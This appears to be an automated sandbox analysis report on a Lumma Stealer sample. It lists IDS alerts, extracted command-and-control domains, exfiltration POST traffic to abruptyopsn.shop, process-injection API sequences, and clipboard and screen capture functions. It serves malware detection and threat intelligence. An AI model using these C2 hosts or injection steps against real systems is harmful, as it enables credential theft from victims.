                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [esi], cx2_2_008B6F8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]2_2_008C4F91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h2_2_008C4F91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]2_2_008DDFB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [esi], al2_2_008BBFCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]2_2_008C37D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]2_2_008B7FE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]2_2_008B7FE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push eax2_2_008ABF40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_008B8740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edi], dx2_2_008B4777

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: ingreem-eilish.biz
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.48.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8Q1SN741JY6N9PGIPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1MZ47H0KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8731Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GPAI8DCFR4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XPL7PGYO3KAM3SH2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1265Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=280R3H752XCOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1094Host: abruptyopsn.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: abruptyopsn.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: ingreem-eilish.biz
                Source: global trafficDNS traffic detected: DNS query: nearycrepso.shop
                Source: global trafficDNS traffic detected: DNS query: abruptyopsn.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abruptyopsn.shop
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000002.00000003.1848093457.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000002.1858835809.0000000002CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/
                Source: aspnet_regiis.exe, 00000002.00000003.1793722966.0000000005206000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1793743243.000000000520C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1794325694.000000000520F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/Q
                Source: aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/Y
                Source: aspnet_regiis.exe, 00000002.00000002.1858761118.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1858796383.0000000002CEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002CD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/api
                Source: aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/api3L
                Source: aspnet_regiis.exe, 00000002.00000002.1858796383.0000000002CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apiF9
                Source: aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apiHP2
                Source: aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/apil
                Source: aspnet_regiis.exe, 00000002.00000003.1848294035.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop/s
                Source: aspnet_regiis.exe, 00000002.00000002.1859335137.0000000005218000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1847974851.0000000005218000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abruptyopsn.shop:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D2D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_008D2D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D2D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_008D2D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D2FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_008D2FE0

                System Summary

                barindex
                Source: ReploidReplic.exeStatic PE information: section name: KzTnD~C
                Source: ReploidReplic.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE078B0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,CreateProcessW,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,CloseHandle,NtWriteVirtualMemory,NtCreateThreadEx,0_2_6CE078B0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE06BD0 GetModuleHandleW,NtQueryInformationProcess,0_2_6CE06BD0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0083DCE00_2_0083DCE0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008592E00_2_008592E0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0082F6000_2_0082F600
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0085CC300_2_0085CC30
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008256400_2_00825640
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_00827E400_2_00827E40
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0083FA600_2_0083FA60
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008270700_2_00827070
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008535900_2_00853590
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0083DFB00_2_0083DFB0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_00826BE00_2_00826BE0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008543E00_2_008543E0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_0083E7100_2_0083E710
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008243500_2_00824350
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008239500_2_00823950
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008263600_2_00826360
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_008293700_2_00829370
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE078B00_2_6CE078B0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE017F00_2_6CE017F0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE06BD00_2_6CE06BD0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE074F00_2_6CE074F0
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE010100_2_6CE01010
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE049000_2_6CE04900
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE192F10_2_6CE192F1
                Source: C:\Users\user\Desktop\ReploidReplic.exeCode function: 0_2_6CE0E6B00_2_6CE0E6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C60002_2_008C6000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C10602_2_008C1060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D88602_2_008D8860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DFB802_2_008DFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B93622_2_008B9362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008E04802_2_008E0480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DBCE02_2_008DBCE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D84F02_2_008D84F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A95A02_2_008A95A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B8DF12_2_008B8DF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CBE8A2_2_008CBE8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AD6F82_2_008AD6F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008ADE482_2_008ADE48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A86402_2_008A8640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B58822_2_008B5882
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AA8A02_2_008AA8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D90A02_2_008D90A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF0CB2_2_008DF0CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A38D02_2_008A38D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A58E02_2_008A58E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D08E02_2_008D08E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008AD0FF2_2_008AD0FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A88F02_2_008A88F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D28002_2_008D2800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B98202_2_008B9820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C90402_2_008C9040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008D80402_2_008D8040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008CA0502_2_008CA050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C58502_2_008C5850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DC1B02_2_008DC1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C63602_2_008C6360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008DF1B02_2_008DF1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008C29CD2_2_008C29CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B11E92_2_008B11E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008E01302_2_008E0130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008B61482_2_008B6148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_008A91402_2_008A9140
